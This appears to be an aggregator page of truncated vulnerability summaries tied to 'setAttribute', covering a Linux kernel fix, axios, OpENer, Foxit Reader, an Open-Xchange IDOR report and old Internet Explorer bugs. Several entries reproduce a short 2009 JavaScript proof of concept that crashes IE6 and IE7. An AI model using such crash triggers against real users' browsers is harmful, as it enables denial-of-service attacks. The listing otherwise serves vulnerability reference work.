Azure Linux 3.0 Security Update: kernel (CVE-2025-38181)

The version of kernel installed on the remote Azure Linux 3.0 host is prior to tested version. It is, therefore, affected by a vulnerability as referenced in the CVE-2025-38181 advisory. - In the Linux kernel, the following vulnerability has been resolved: calipso: Fix null-ptr-deref in...

UBUNTU-CVE-2024-57965

In axios before 1.7.8, lib/helpers/isURLSameOrigin.js does not use a URL object when determining an origin, and has a potentially unwanted setAttribute'href',href call. NOTE: some parties feel that the code change only addresses a warning message from a SAST tool and does not fix a vulnerability...

CVE-2022-43605

An out-of-bounds write vulnerability exists in the SetAttributeList attributecountrequest functionality of EIP Stack Group OpENer development commit 58ee13c. A specially crafted EtherNet/IP request can lead to an out of bounds write, potentially causing the server to crash or allow for remote cod...

CVE-2018-17649

This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 9.2.0.9297. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the...

Foxit Reader XFA TimeField setAttribute Use-After-Free Remote Code Execution Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of the...

Open-Xchange: IDOR - setAttribute action of user object in API

Note. I selected sandbox.open-xchange.com as the asset in Hackerone but this was tested on a local installation . Hello, There appears to be a possible IDOR vulnerability in the following API endpoint for setting custom attributes:...

CVE-2009-3019

Microsoft Internet Explorer 6 on Windows XP SP2 and SP3, and Internet Explorer 7 on Vista, allows remote attackers to cause a denial of service application crash via JavaScript code that calls createElement to create an instance of the LI element, and then calls setAttribute to set the value...

MS Internet Explorer (Javascript SetAttribute) Remote Crash Exploit

No description provided by source. html head title Irfan Asrar/title /head body onload="c" Set Attribute Crash : Tested with IE7 Vista IE6 XP2 IE6 XP3 script type="text/javascript" function c var li = document.createElement"li"; li.setAttribute"value", "1"; li.value = "1"; /script /body /html...

Microsoft Internet Explorer - JavaScript SetAttribute Remote Crash

Irfan Asrar Set Attribute Crash : Tested with IE7 Vista IE6 XP2 IE6 XP3 function c var li = document.createElement"li"; li.setAttribute"value", "1"; li.value = "1"; milw0rm.com 2009-08-18...

Microsoft Internet Explorer - JavaScript SetAttribute Remote Crash

Microsoft Internet Explorer - JavaScript SetAttribute Remote Crash Irfan Asrar Set Attribute Crash : Tested with IE7 Vista IE6 XP2 IE6 XP3 function c var li = document.createElement"li"; li.setAttribute"value", "1"; li.value = "1"; milw0rm.com 2009-08-18...

MS Internet Explorer (Javascript SetAttribute) Remote Crash Exploit

Exploit for unknown platform in category dos / poc =================================================================== MS Internet Explorer Javascript SetAttribute Remote Crash Exploit =================================================================== Irfan Asrar Set Attribute Crash : Tested wit...